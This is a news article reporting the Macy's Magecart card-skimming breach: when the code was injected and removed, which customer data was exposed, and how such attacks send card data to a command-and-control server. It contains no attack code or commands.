Macy's has announced a data breach caused by Magecart card-skimming code being implanted in the firm's online payment portal.
In a letter issued to customers, the company says that it was alerted to the security incident on October 15, and the Macy's team quickly found that card-skimming script had been injected into two pages on the Macy's website.
The code, believed to have been injected on October 7, impacted the Macy's checkout page and wallet page, the latter of which is accessed through the "My Account" facility.
"The unauthorized code was highly specific and only allowed the third-party to capture information submitted by customers," the US department store chain said.
While the code was removed on the same day Macy's was alerted to the problem, customers that have placed orders online or submitted financial details into their wallets may have had their information stolen.
This data includes first and last names, physical addresses, ZIP codes, email addresses, payment card numbers, card security codes, and expiration dates.
It is not known how many customers may have been embroiled in the data-stealing campaign, which lasted at least a week before Macy's knew of its compromise. However, a Macy's spokesperson told Bleeping Computer that only a "small" number of customers were involved, and they would be offered consumer protection services for free.
"We quickly contacted federal law enforcement and brought in a leading class forensics firm to assist in our investigation," the company says. "We have reported the relevant payment card numbers to the card brands. In addition, we have taken steps that we believe are designed to prevent this type of unauthorized code from being added to macys.com."
This sort of incident is known as a Magecart attack, in which an umbrella term used to describe card-skimming malware implants on otherwise legitimate e-commerce domains.
This data is then harvested and sent to a command-and-control (C2) server, where it may be used to create clone cards, for fraudulent online purchases, or sold on in batch information dumps on underground forums.
An anonymous researcher investigating the Macy's attack told Bleeping Computer that a ClientSideErrorLog.js script was tampered with to host Magecart code. Once a victim submitted their payment details, this data was then whisked away to a remote C2 hosted at Barn-x.com.
When active Magecart campaigns are detected, malicious code needs to be stripped out and any vulnerabilities that made the code injection possible in the first place have to be resolved.
Cybersecurity researchers are sometimes able to track the campaigns back to their C2s, which can be shut down by notifying hosts of their malicious purposes. However, as recently discovered by RiskIQ, these domains can be repurchased by threat actors once they are released back to the market, and if Magecart callouts are still active, they may be repurposed for ad fraud and malvertising.
Previous and related coverage
- UniCredit reveals data breach exposing 3 million customer records
- 700,000 Choice Hotels records leaked in data breach, ransom demanded
- This is the impact of a data breach on enterprise share prices
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0